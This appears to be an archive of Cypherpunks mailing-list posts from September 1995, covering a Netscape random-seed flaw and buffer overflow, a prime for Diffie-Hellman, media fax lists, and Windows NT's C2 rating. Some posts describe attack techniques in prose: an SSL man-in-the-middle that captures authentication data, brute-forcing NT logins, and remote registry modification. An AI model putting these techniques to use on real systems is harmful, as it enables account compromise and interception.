cstearns at hr.house.gov, canady at hr.house.gov, pdeutsch at hr.house.gov, hastings at hr.house.gov, jlinder at hr.house.gov, georgia6 at hr.house.gov, saxby at hr.house.gov, ga10 at hr.house.gov, runderwo at hr.house.gov, brush at hr.house.gov, luisg at hr.house.gov, hfawell at hr.house.gov, dhastert at hr.house.gov, durbin at hr.house.gov, johnhost at hr.house.gov, emailpat at hr.house.gov, edky01 at hr.house.gov, mward2 at hr.house.gov, bunning4 at hr.house.gov, torkma06 at hr.house.gov, jmoakley at hr.house.gov, cardin at hr.house.gov, tellhoek at hr.house.gov, congehlr at hr.house.gov, davecamp at hr.house.gov, repsmith at hr.house.gov, chrysler at hr.house.gov, lrivers at hr.house.gov, jconyers at hr.house.gov, gil at hr.house.gov, dminge at hr.house.gov, mn03 at hr.house.gov, vento at hr.house.gov, tellbill at hr.house.gov, tocollin at hr.house.gov, oberstar at hr.house.gov, goldsmit at iquest.net talentmo at hr.house.gov, demldr at hr.house.gov, bemerson at hr.house.gov, bthompson at hr.house.gov, funnc02 at hr.house.gov, thechief at hr.house.gov, mail2nc5 at hr.house.gov, crose at hr.house.gov, myrick at hr.house.gov, chtaylor at hr.house.gov, melmail at hr.house.gov, epomeroy at hr.house.gov, zeliff at hr.house.gov, franksnj at hr.house.gov, dzimmer at hr.house.gov, mpforbes at hr.house.gov, lazio at hr.house.gov, tmanton at hr.house.gov, molinari at hr.house.gov, rangel at hr.house.gov, jserrano at hr.house.gov, engeline at hr.house.gov, boehlert at hr.house.gov, bpaxon at hr.house.gov, portmail at hr.house.gov, hokemail at hr.house.gov, istook at hr.house.gov, furseor1 at hr.house.gov, pdefazio at hr.house.gov, murtha at hr.house.gov, jonfox at hr.house.gov, mchale at hr.house.gov, pa16 at hr.house.gov, jspratt at hr.house.gov, cwilson at hr.house.gov, samtx03 at hr.house.gov, barton06 at hr.house.gov, doggett at hr.house.gov, frost at hr.house.gov, ggreen at hr.house.gov, enidutah at hr.house.gov, ortonut3 at hr.house.gov, opickett at hr.house.gov, talk2bob at hr.house.gov, ninthnet at hr.house.gov, bsanders at igc.apc.org, repwhite at hr.house.gov, asklinda at hr.house.gov, dunnwa08 at hr.house.gov, rtate at hr.house.gov, mneumann at hr.house.gov, badger02 at hr.house.gov, roth08 at hr.house.gov, commerce at hr.house.gov, slabmgnt at hr.house.gov, resource at hr.house.gov, housesst at hr.house.gov, smbizcom at hr.house.gov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGdiOj5A4+Z4Wnt9AQH5dwP+ItAzI/4EpqKaO34oKpOyI2QFcX8o5IYf vqAWC9u4D/cEuWx8hmVIe+r5iFmgbx3jIW2fPtzeu9G8VnPu5YrefzQGVR1UQsNz ockVde+WJb96M+To8u2141zMkHSr3ZurHjWk+K6Ft4c1ek0eRkYchUwEnvfigwZb DQCDjR+mb84= =az85 -----END PGP SIGNATURE----- ******************************************************************** Lynne L. Harrison, Esq. 34 Cannon Street Poughkeepsie, New York 12601 (914) 454-8130 E-Mail: lharrison at mhv.net "Say not, 'I have found the truth', but rather, 'I have found a truth.'" - Kahlil Gibran from "The Prophet" ******************************************************************** From dlv at bwalk.dm.com Tue Sep 26 06:24:38 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Tue, 26 Sep 95 06:24:38 PDT Subject: Net KiddiePorn Hype on TV In-Reply-To: Message-ID: <9cg1BD6w165w@bwalk.dm.com> jkandt at mail.wsdot.wa.gov (Jeff Kandt) writes: > I heard that piece too. Sounded like a total PR move for Curtis > Slewah(sp?) and his Guardian Angels. They certainly didn't sound like they > knew what they were doing, technically speaking. Curtis Sliwa is rather notorious in NYC politics. He used to have a talk show with his wife Lisa in WABC; not sure what happened to it after they got divorced. He admitted staging an physical attack on himself to increase his popularity; after the attack he claimed the cops did it. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From khijol!erc at cygnus.com Tue Sep 26 06:29:20 1995 From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin]) Date: Tue, 26 Sep 95 06:29:20 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: Message-ID: <199509260036.TAA21140@khijol> -----BEGIN PGP SIGNED MESSAGE----- > Very interesting. I wouldn't be too sure that a transmitted signal at a > single frequency is the only signal that an opponent could use to bias your > random numbers. How do you "test for randomness". I think that signal to > noise arguments, phrased in terms of entropy, can protect you against > unknown and unwanted signal. (Ironically you want a very low signal to > noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you > need n bits and run them thru MD5. Here S is the signal strength of the > maximum plausible unwanted signal, and N is the noise of the diode. I tested for randomness by looking at the distribution of random numbers over the range I was drawing random numbers from. If it didn't look random, it wasn't ;) - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGdK9SS9AwzY9LDxAQHdVQQAjwez1skYK8eaClLEq7mCb0V8aPERe/58 3AxH5W9JuaJqWD/nArVLW7HAY4tOM5Sjb2IHZsK3wF29Bd3A/TI0GM5Y1y2vOF9P rNlkM2schf2nfsx7BdfqxWYELxCRUUeZTIagxwWSNMmCbMS22bMiYguVnxHqrjj1 g9n1fCzVDHA= =tpBm -----END PGP SIGNATURE----- From Matthew.Sheppard at Comp.VUW.AC.NZ Tue Sep 26 06:29:22 1995 From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard) Date: Tue, 26 Sep 95 06:29:22 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: <199509252300.QAA29812@infinity.c2.org> Message-ID: <199509260102.NAA09663@bats.comp.vuw.ac.nz> The shadowy figure took form and announced "I am sameer and I say ... > > On Mon, 25 Sep 1995, John Young wrote: > > > > > The Wall Street Journal, September 25, 1995, p. B12. > > > > > Marc Andreessen, vice president of technology at Netscape, > > > said the company will issue fixes for the recent glitches > > > later this week. He added that it's unclear whether > > > anything other than temporarily crashing a user's computer > > > could result trom the recent flaw. > > > > Oh Marc, you didn't really want to say that, did you? > > > > -Thomas > > He's -asking- for an exploit. Tshirts to Ray and the person who > does the exploit, if it gets written. Maybe I should just ring up 8lgm and > have them do one. It isn't simple, you need to know the absolute address of where the supplied code will be and alter the return address on the stack to that address. With NCSA HTTPD 1.3 and with fingerd (re internet worm) the stack was always in a known state when the buffer overwrite occurred, thus the absolute address of attacking code is static and placed at the correct stack location. With Netscape 1.1 the state of the stack is much more dynamic, in particular the user can be viewing documents at an arbitary depth in the "web tree", each recursion will increase the stack pointer (or decrease with some architectures) There is no way of knowing for certain where you code will end up and thus no way to reliably alter the return address on the stack to execute your arbitary code. You could always gamble on popular states, like when the first url fetched by the browser. Also you could direct execution to any routine in the netscape binary (with unknown arguments) . The most detrimental offhand would be deleting the bookmarks file (whoopee) And with Netscape 2 comming RSN I wouldn't waste too much time. -- |~ |~ |~ o| o| ('< o| ,',) ''<< ---""--- From karn at qualcomm.com Tue Sep 26 06:31:45 1995 From: karn at qualcomm.com (Phil Karn) Date: Tue, 26 Sep 95 06:31:45 PDT Subject: Primality verification needed Message-ID: <199509260050.RAA14732@servo.qualcomm.com> Hi. I've generated a 2047-bit "strong" prime number that I would like to use with Diffie-Hellman key exchange. I assert that not only is this number 'p' prime, but so is (p-1)/2. I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version 1.3.2 to test this number. This function uses the Miller-Rabin primality test. However, to increase my confidence that this number really is a strong prime, I'd like to ask others to confirm it with other tests. Here's the number in hex: 72a925f760b2f954ed287f1b0953f3e6aef92e456172f9fe86fdd8822241b9c9788fbc289982743e fbcd2ccf062b242d7a567ba8bbb40d79bca7b8e0b6c05f835a5b938d985816bc648985adcff5402a a76756b36c845a840a1d059ce02707e19cf47af0b5a882f32315c19d1b86a56c5389c5e9bee16b65 fde7b1a8d74a7675de9b707d4c5a4633c0290c95ff30a605aeb7ae864ff48370f13cf01d49adb9f2 3d19a439f753ee7703cf342d87f431105c843c78ca4df639931f3458fae8a94d1687e99a76ed99d0 ba87189f42fd31ad8262c54a8cf5914ae6c28c540d714a5f6087a171fb74f4814c6f968d72386ef3 56a05180c3bec7ddd5ef6fe76b1f717b The generator, g, for this prime is 2. Thanks! Phil Karn From ses at tipper.oit.unc.edu Tue Sep 26 06:32:16 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 26 Sep 95 06:32:16 PDT Subject: SSL Man-in-the-middle In-Reply-To: <447bes$7ai@tera.mcom.com> Message-ID: Jeff - there are two ways to get the document information right (or wrong). The first approach is to use redirects to point the client back at the original server once you've grabbed whatever info you want for the request. Redirects from https -> https don't trigger a warning box. You may need to rewrite the URL slightly to prevent loop detection (stick a . at the end of the hostname, or add a port, etc. The second approach is to only intercept requests for inline images. These don't affect the document information window, and give you full access to the whole request, which may have user authentication information associated with it, in the URL or in header fields. Image requess can be identified reliably through simple traffic analysis. Simon Contract with America - Explained! |Phone: +44-81-500-3000 Contract: verb |Mail: ses at unc.edu 1) To shrink or reduce in size - the economy contracted +----------------------- 2) To become infected -My baby contracted pneumonia when they stopped my welfare From kelli at zeus.towson.edu Tue Sep 26 06:34:19 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Tue, 26 Sep 95 06:34:19 PDT Subject: Fax Number List Message-ID: I promised last week that I would send this out when the idea of a blanket-fax-campaign for a c-punks press release was being discussed. Sorry it took me so long to get around to it, but here it is. I was mistaken in my original posting: it includes neither the Fox Network _nor_ the Eye on America show, but I'm sure we'll find those numbers somewhere. I got it from the Iron Feather Journal, volume 14. I have no reason to believe that any of these numbers are incorrect, but some of them may have changed. Also: personal apologies to anyone who considers this to be noise. Please restrict all flames to private e-mail. Anybody wanna fax Ted Turner? :) ABC 20/20 NY 1-212-456-2969 ABC World News NY 1-212-456-4968 Ann Arbor News Ann Arbor, MI 1-313-994-6879 AP Los Angeles 1-213-748-1200 AP San Diego 1-619-291-2098 AP Washington, D.C. 1-202-828-6422 AP (Broadcast) Washington, D.C. 1-202-955-7367 Associated Press Boston, MA 1-617-338-8215 Associated Press Los Angeles 1-213-748-9836 Steve Loeper Associated Press Phoenix, AZ 1-602-254-9573 Assignment Editor Associated Press San Francisco 1-415-552-9430 Bill Schiffmann Associated Press MN Minneapolis, MN 1-612-332-4245 Boston Phoenix Boston, MA 1-617-536-1463 Boulder Daily Camera Boulder, CO 1-303-442-1508 C-SPAN Washington, D.C. 1-202-737-6226 Sarah Traheorn CBS NY 1-212-975-1519 CBS Washington, D.C. 1-202-659-2586 CBS (Radio) Washington, D.C. 1-202-659-5578 CBS Eve News NY 1-212-975-2115 CBS Morning Washington, D.C. 1-202-331-1765 CBS News Los Angeles 1-213-651-0285 Jennifer Siebens CBS News San Francisco 1-415-362-7417 John Blackstone CBS TV Los Angeles 1-213-651-0321 CBS TV San Francisco 1-415-362-7417 Ch. Sci Monitor Washington, D.C. 1-202-223-3476 Chicago Sun-Times Chicago, IL 1-312-321-3084 Chicago Tribune Chicago, IL 1-312-222-3143 CNN Los Angeles 1-213-460-5081 CNN San Francisco 1-415-398-4049 CNN President Atlanta, GA 1-404-827-1575 Ted Turner Coloradoan Fort Collins, CO 1-303-224-7726 Denver Post Denver, CO 1-303-820-1369 Der Spiegel Hollywood, CA 1-213-851-9867 Frances Schoenberg Detroit News Detroit, MI 1-313-222-2335 Gannett Washington, D.C. 1-202-243-0190 Gannett News Service Sacramento, CA 1-916-446-7326 Becky Lavally Good Mng America Washington, D.C. 1-202-887-7685 Mother Jones San Francisco, CA 1-415-863-5136 Douglas Foster NBC Washington, D.C. 1-202-362-2009 NBC (Radio) Washington, D.C. 1-703-685-2197 NBC News Burbank, CA 1-818-840-4275 Heather Allan NBC News New York, NY 1-212-956-2140 NBC News San Francisco, CA 1-415-441-2823 David Burrington NBC News President New York, NY 1-212-315-4037 Michael Gartner NBC TV Los Angeles 1-818-840-4275 NBC TV San Francisco, CA 1-415-441-2823 Newsweek Los Angeles, CA 1-213-444-5287 Managing Editor Newsweek New York, NY 1-212-421-4993 Jonathan Alter Newsweek Washington, D.C. 1-202-783-6512 NPR Radio San Francisco, CA 1-415-553-2241 NY Times New York, NY 1-212-556-4603 PBS Alexandria, VA 1-703-739-0775 Pulse! West Sacramento, CA 1-916-373-2480 Laurie Macintosh Rainbow Coalition Washington, D.C. 1-202-728-1192 Reuters Los Angeles 1-213-622-0056 Rocky Mountain News Denver, CO 1-303-892-5499 Scripps Howard Washington, D.C. 1-202-408-8116 Shareware Magazine Sunnyvale, CA 1-408-730-2107 Tracy Stephenson Time San Francisco, CA 1-415-434-5209 Paul Witteman Time Magazine NY 1-212-522-0451 UPI Boston, MA 1-617-338-9774 Barry Fly UPI Los Angeles 1-213-620-1237 UPI San Francisco 1-415-552-3585 Bill Bucy UPI Seattle, WA 1-206-283-0408 Penny Spar UPI Washington, D.C. 1-202-789-2362 UPI (Radio) Washington, D.C. 1-202-842-3625 US News & Wrld Rprt Washington, D.C. 1-202-955-2713 USA Today Washington, D.C. 1-202-276-5527 Utne Reader Minneapolis, MN 1-612-338-6043 Whole Earth Review Sausalito, CA 1-415-332-2416 Kevin Kelly kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)> PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu "All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ." -Richard Adams From jirib at sweeney.cs.monash.edu.au Tue Sep 26 06:37:42 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Tue, 26 Sep 95 06:37:42 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! In-Reply-To: Message-ID: <199509261336.XAA20707@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello craig at passport.ca (Craig Hubley) and perry at piermont.com and cypherpunks at toad.com craig at passport.ca (Craig Hubley) writes: ... > > we've gone over this many times. We aren't a group. We're a mailing > > list. We've got a diversity of opinions, and we have no organization ... > True enough, but there are sometimes rough consenses on technical questions, ... Consenses or consensuses or consenci? Maybe consensen? Consensix? > "Consensus on cypherpunks seems to be that 40 bit encryption is not viable > for commercial applications, and that Netscape seems to have taken less > than due care to choose an appropriate random seed for its session keys." Careful there, that comma is rather small to be between two completely unrelated statements. You might want a semicolon, full stop or better yet a paragraph break. If you want another to make a round number, how about something about GAK and a-screwed keys? I think there's a consensus on that one... (definitely stronger than on the Netscape point, anyway) Good luck, anyway! Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMGgB5SxV6mvvBgf5AQHvuAQAihd2DyYnbhwQL2lHcs0qhnmS7U5pguGu YLCPszybtprsOJ818K5RpFcBFkg+n8TALMONovyt/IDQjo3LLWvx/XO+MrbeLdLU EpgOo1O73z2/GpcCmmGaamzt9+0+lXc05Xnepl3iwihgQtWgG+XUyLcASKk28/SJ JvwzwIbttc4= =L7Vi -----END PGP SIGNATURE----- From perry at piermont.com Tue Sep 26 06:56:14 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 06:56:14 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! In-Reply-To: Message-ID: <199509261355.JAA16305@frankenstein.piermont.com> Craig Hubley writes: > > we've gone over this many times. We aren't a group. We're a mailing > > list. We've got a diversity of opinions, and we have no organization > > -- nor do we want one. > > True enough, but there are sometimes rough consenses on technical questions, > and if it were clear enough that these were collective in nature and not to > be ascribed to any particular person, e.g.: > > "Consensus on cypherpunks seems to be that 40 bit encryption is not viable > for commercial applications, and that Netscape seems to have taken less > than due care to choose an appropriate random seed for its session keys." Why bother? Why not just say, if asked, that most reasonable technical experts believe 40 bits are too small, or show them by a technical demonstratino as we already have? There is this widespread and wholely misplaced affection for "cypherpunks". We aren't a company or an organization. This is a mailing list, and occassionally a seminar series in places like NoCal. It isn't a "group". Perry From perry at piermont.com Tue Sep 26 07:12:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 07:12:10 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: <199509261411.KAA16336@frankenstein.piermont.com> Craig Hubley writes: > I'd volunteer to be 'spokespunk', You don't speak for me, sir, and never will. I do my own talking to the press. Oh, and thank you for helping Detweiler start another flame war. I'm sure he's very happy (in between thorzine doses). Perry From perry at piermont.com Tue Sep 26 07:19:33 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 07:19:33 PDT Subject: Fax Number List In-Reply-To: Message-ID: <199509261418.KAA16344@frankenstein.piermont.com> There are not going to be any "cypherpunks press releases" so there is no need for this. "K. M. Ellis" writes: > > I promised last week that I would send this out when the idea of a > blanket-fax-campaign for a c-punks press release was being discussed. From rfb at lehman.com Tue Sep 26 07:23:57 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Tue, 26 Sep 95 07:23:57 PDT Subject: Easter Eggs In-Reply-To: <199509260259.WAA20138@book.hks.net> Message-ID: <9509261421.AA00130@cfdevx1.lehman.com> -----BEGIN PGP SIGNED MESSAGE----- Date: Mon, 25 Sep 1995 22:59:11 -0400 From: Lucky Green Subject: Re: Netscape "random" number seed generator code available In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim Gillogly) wrote: >I'm nervous enough about all the Easter Eggs that have been reported in >Netscape, like the secret keystroke shortcut to get to Fishcam, or the >different behavior it exhibits when it finds a certain obscurely-named >directory at the top level. Would you please elaborate? Personally, I like the Easter Eggs in Netscape and other software products. I don't know if there's an consensus definition of `Easter Egg', but my working definition is something like ``An unpublicized, unharmful, preferably amusing, feature for which interested users may hunt.'' I think that such things add some fun for curious users and indicate a bit of `hacker spirit' in the development team -- meaning `hacker' in the classic sense, not the media-bastardize synonym of `cracker'. I also think that in Netscape their existance is an indication that the managment at Netscape is a bit less uptight than management at some other places. I didn't know about the FishCam Easter Egg, but I know that Netscape has a couple of Easter Eggs related to the activity indicator in the top right of the display. Typically this is the Big N logo with animated meteors, etc. flying by when the window is active. One Easter Egg temporarily turns this into a compass which spins to indicate activity. Another causes the animation to show a dragon (Mozilla) breathing fire for the remainder of the session. I won't spoil your fun by telling how to find them. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGgMNJNR+/jb2ZlNAQEnnQP/TAYOTJtoWX8Pn0cXrKNSlpTCFnyWxC+3 U1E5xUxWMXsbEet3ENu35NtR03ZeyZCVr5viKTTmLptwFf/Qac4isTU78G3YOFTe A3dX2KZfshxDtrk+n3Rx+NQtUSA+qRn/r0mPYLlFrsMCIXi/sUVhQKY1BH1eRXUK tghPqDV0exE= =jgb5 -----END PGP SIGNATURE----- -- Rick Busdiecker Please do not send electronic junk mail! net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From todd at lgt.com Tue Sep 26 07:28:55 1995 From: todd at lgt.com (Todd Glassey) Date: Tue, 26 Sep 95 07:28:55 PDT Subject: Hack Microsoft? Message-ID: Ray scribes: > Microsoft recently got C2-security status approved for Windows NT by >the National Computer Security Center, a division of the NSA. They >are supposed to put systems through "laborious testing and review" before >they approve C2. Not so laborious, the brunt of C1 and C2 testing is accomplished by a test suites that do topical levels only. The issue is that there is a NCSC engineer watching it happen. Hence if oit passes it is "blessed". As per the orange book itself, C2 is about the lowest level of "Secure" that you can get. In fact if Microsoft had gone to the trouble of a B1 or B2 rating this would have been impressive but since most systems analysts have not been familiarized with the levels of system accounting and access control/logging that represents the various levels of "Orange Book" Rating it is somewhat superfluous. >So, if one can find bugs in NT's security, one can >toss a little more egg on the NSA's face and the sham that part of >their activies to *help* to secure american computers. A simple >violation of NT's C2 status would be to demostrate a flaw in it's >memory protection implementation. >Personally, I think NT is >*riddled* with bugs waiting to be discovered. Hell, even the >NT "service pack" is included in the C2 status, which I bet >has plenty of holes. No Doubt; NT should be easily hacked in the upcomming months by any number of mortals let alone the gods themselves. What UNIX has that NT doesn't (which makes it more vuknerable to attack) is 20 more years of evolution, More copies, everybody knows it (at least in our group)... As per NT's orange book C2 Rating... C2 is about the lowest level of Secure that you can get. In fact I personally am unimpressed, rather it is a box on an RFQ that gets checked Very few people run C anything sites in reality. If Microsoft had gone to the trouble of a B1 or B2 rating this would have been cool but since most system's analysts have not been familiarized with the levels of system accounting and access control/logging that represents the various levels of "Orange Book" Rating it is somewhat superfluous. This is especially true since the Folks at the FRB and FDIC/FSLIC orgaizations are more likely to require B2 or the like on the National Standards for "blessed" commerce Engines (I wonder what the FSTC has to say about this?). Seems to me like the "Evil Empire" is just puffing it's chest for a very very small market... IMHO - Military sites passing real classified data usually are not run on anything as low as C2. If you want a secure os, look at the Harris Computer Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). FOUO - For Official Use Only sites often run C1/C2 based OS's for Audit training but are usually not part of the Trusted Computing Base and as such not real threats. Still the most common problem is human not the OS. Not the actual OS itself,. > > If Cypherpunks can find flaws that the NSA can't, or won't divulge, >what does that say about their so-called COMSEC ability. Not necessarily on the NSA, you have to start somewhere and they do a good job as far as NIST and NCSC efforts are concerned. If you can do better then you have a good career in commercial cracking or will have lots of time on your hands (Federal Food is the Pits, and the golf course is gone from Lompoc!). > >-Ray > > > > Regards, T. S. Glassey Chief Technologist Looking Glass Technologies todd at lgt.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0 0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y =bTYb -----END PGP SIGNATURE----- From dan at milliways.org Tue Sep 26 07:33:22 1995 From: dan at milliways.org (Dan Bailey) Date: Tue, 26 Sep 95 07:33:22 PDT Subject: Hack Microsoft? Message-ID: <199509261433.AA11352@ibm.net> On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote: > > > Microsoft recently got C2-security status approved for Windows NT by >the National Computer Security Center, a division of the NSA. They >are supposed to put systems through "laborious testing and review" before > If Cypherpunks can find flaws that the NSA can't, or won't divulge, >what does that say about their so-called COMSEC ability. > For fun ways to hack NT, check out http://www.somar.com/security.html. Some of these are really laughable. You can use NT's LogonUser API call to repeatedly guess passwords until you hit it, since NT offers no way to limit number of login attempts. There also is no way to stop remote users from modifying the registry. *Any* user with an account can remotely dump and modify the system registry. So in theory you can write a bruteforce program to keep guessing until it gets a password, then modify the registry to make the system to "interesting" things. The worst part of all this is that the Registry is very poorly documented, MSoft must consider most of that info "confidential." Fortunately, when using NT's SMB services such as drive and file sharing, passwords are never sent in the clear. Just make sure you disable that "Guest" account.:) Dan Bailey *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From tfs at vampire.science.gmu.edu Tue Sep 26 07:45:11 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Tue, 26 Sep 95 07:45:11 PDT Subject: Hack Microsoft? In-Reply-To: <199509260404.AAA14297@clark.net> Message-ID: <9509261444.AA10518@vampire.science.gmu.edu> It should be possible to FOIA the evaluation that led to the C2 status on this. That would be one good avenue to start looking at it. At the end of the process there should be a document that shows how the OS meets each of the C2 requirments and what aspects of the software were considered as well. Things like the state the OS was running under at the time, (network vs. non-network etc.) are important considerations in evaluations. And I would not be too surprised at all if the "C2" designation was relativly bogus. This sort of thing can get much like the anti-crypto crowds arguments. Highly political with little basis in rationality. Since I've seen stuff like a ported version of Unix's "ps" utility, and know NT runs a microkernel, I can think of a hell of allot of ways it'd be possible to fail it right out of the box... Considering that it has the cpacity to do all sorts of network stuff, including FTP & the like, I wonder how the hell they passed any audit requirements. Probably a "Well it runs in a single user model, we don't need to have strong audit requirments". My point basicly being that I would consider the C2 designation for this to be broken coming out of the box unless I saw proof that it was otherwise. To operate it in a C2 required environment without consideration of how & under what conditions the rating was achived would be criminaly irresponsible. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From cactus at hks.net Tue Sep 26 08:00:50 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Tue, 26 Sep 95 08:00:50 PDT Subject: Archives current again Message-ID: <199509261458.KAA22013@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I've just updated the archives (http://www.hks.net/cpunks/index.html). To bring everybody up to date on what's happening: Hypermail simply isn't up to this size of an archive. All sorts of bugs are coming out into the open, so I've been implementing a system designed for large archives. Alas, reality has intruded and I haven't had the time to finish it. So, I'll be updating the archives by hand from time to time until I can get the new system on line. Sorry 'bout that, folks, but you get what you pay for. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGgVHCoZzwIn1bdtAQE0gwF/dQiO+4lTabDqAt0SgyHmEJSKXgCABGa6 kEOsJIgd/4uIUzrunV+fXBucevMsW4yG =BngF -----END PGP SIGNATURE----- From tfs at vampire.science.gmu.edu Tue Sep 26 08:09:51 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Tue, 26 Sep 95 08:09:51 PDT Subject: Insecurity in WWW oriented security Message-ID: <9509261509.AA10554@vampire.science.gmu.edu> I wanted to share an experience with folks on the list that points to the relavince of what c'punks have been doing looking at the Web encryption & security issues like we have. I was approached by a headhunter yesterday who wanted me to do the security for a hospital connected to the net. Straightforward stuff one would think. My inital reaction was fairly positive, and I responded that I didn't think I would have much trouble with the task as long as they had a resonable setup internaly etc. etc. (I'm not a big beliver in hard & crunchy -> soft & chewey when your accounting or other critical data is part of what can be chewed up...) Well at that point it got interesting. He told me that said client was asking as a part of their requirments that they be able to do "Secure transactions using HTML & Netscape". My reaction was somwehere allong the lines of "What do they mean by `secure transactions'!! Are they aware that the state of encryption for WWW is really poor at best right now? I told him that I thought this might not be such a hot idea, and that my interest in this whole thing would hinge totaly upon exactly what sorts of transactions they wanted to do using web servers and the like. And that depending on the answer to that, I would or would not be intrested in the whole thing. The reason for my hesitation? I don't want blood on my hands over a setup that is by definition currently in a state of very poor security. And right now I have no idea if they want to transfer MasterCard's or MRI's. But I do know that depending on what it is they're planning, it might not be a place *I* want to be. Besides being damned frightening, this points to a trend in network evolution. Organizations are planning these sorts of moves and utilizations of the technology with little thought to the possible consequences of it. And if the FBI ends up busting some psyco in the future for tampering with the transactions of MRI data, x-rays, or any of a million other possibilities, I seriously doubt that Loius Freeh will be stepping forward to remind us all of the need for robust security. Instead, it is far more likely that he would argue that it was another example of the need for increased monitoring of the internet and controls on cryptographic solutions. I found aspects of the whole conversation, juxtaposed with what has been going on lately with the list chilling to say the least. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From tcmay at got.net Tue Sep 26 08:59:33 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 26 Sep 95 08:59:33 PDT Subject: Cypherpunks Press release Message-ID: I guess you all know how much I hate this "who will be our spokesman?" thread, but my opinion has been explicitly asked, so I will again comment. Hopefully, adding a few new points. At 6:55 AM 9/26/95, Craig Hubley wrote: >Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ? >Should we assign someone to be 'our' lawyer ? > >I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and >print enough, and know how to handle and present myself to the press, but if >this is considered an 'honor' rather than a 'pain in the ass and potential >legal lightning rod' then I'd like to suggest someone with a longer pedigree >who has been writing more code lately take it on. Tim ? I've turned down several recent chances for interviews, for these reasons: 1. I feel the people doing the work should be interviewed, not just someone who has some visibility (whatever mine might be). If PGP is the issue, then they should talk to those working on PGP. If anonymous remailers are the issue, etc. If, by some chance, they are interested in things I have directly worked on or written extensively about, then maybe they should interview me. (Although for other reasons I refused to have my name attached to the cover story in "Information Week" about "Internet Theft," BlackNet, etc.) 2. Location, location, location! The media foci are Washington, New York, and San Francisco, at least for our area of interest. Occasional forays into Austin, Miami, L.A., etc. This is where the taped interviews are done. Several "crews" recently in SF wanted "sound bites" and "video bites" from people like me. I refused, pointing out the wastefullness of my time in driving 100 miles over mountain roads to SF, fighting parking problems, waiting around, and ending up with a 7.89 second clip of me saying something scripted. (In February I stupidly agreed to travel to LA for a filming of a BBC show about encryption. Left at dawn, drove to San Jose, flew to LA, took shuttle to Hollywood, waited around for several hours while crew finished taping Alvin and Heidi Toffler, set up my laptop, was interviewed by show's producer, agreed at her repeated prodding to say "I am a Cypherpunk." Got back to my house at midnight. Guess what they used? The stupid line "I am a Cypherpunk" and maybe about 20 seconds of other random comments. This is what we face, as other high tech shows I see have the same disjointed, out-of-context flavor.) The point? These "journalists" are tuned to 